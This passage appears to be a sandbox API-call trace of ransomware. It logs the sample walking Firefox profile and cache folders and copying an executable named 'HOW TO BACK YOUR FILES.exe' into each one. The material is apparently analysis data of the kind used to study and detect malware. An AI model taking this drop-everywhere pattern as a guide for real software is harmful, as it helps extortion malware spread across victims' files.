cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.965] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox" [0110.965] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox" [0110.965] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.965] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.966] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.966] GetLastError () returned 0x0 [0110.966] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.966] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d79db40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d79db40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.967] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0110.967] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0110.967] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.967] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.967] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.968] GetLastError () returned 0x0 [0110.968] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.968] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d79db40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d79db40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.968] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0110.969] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0110.969] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.969] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.969] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.970] GetLastError () returned 0x0 [0110.970] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.970] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6b65e400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b65e400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.970] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails" [0110.970] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails" [0110.970] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.970] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.971] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.971] GetLastError () returned 0x0 [0110.972] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.972] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb653ec30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6b684560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b684560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.972] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache" [0110.972] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache" [0110.972] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.972] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.973] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.973] GetLastError () returned 0x0 [0110.973] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.973] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x807f0230, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b6aa6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6aa6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.974] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing" [0110.974] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing" [0110.974] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.974] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.975] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.975] GetLastError () returned 0x0 [0110.975] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8234ff30, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b768da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b768da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.975] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache" [0110.976] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache" [0110.976] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.976] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.976] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.977] GetLastError () returned 0x0 [0110.977] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.977] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbece2650, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d7e9e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d7e9e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.977] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache" [0110.978] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache" [0110.978] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.978] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.978] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.979] GetLastError () returned 0x0 [0110.979] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.979] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6baaebe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6baaebe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.979] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F" [0110.979] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F" [0110.979] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.979] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.980] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.980] GetLastError () returned 0x0 [0110.981] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d85c220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d85c220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.981] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0" [0110.981] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0" [0110.981] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.981] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.982] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.982] GetLastError () returned 0x0 [0110.982] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.982] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82329dd0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bad4d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bad4d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.983] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23") returned="C:\\Users\\5p5NrGJn0jS 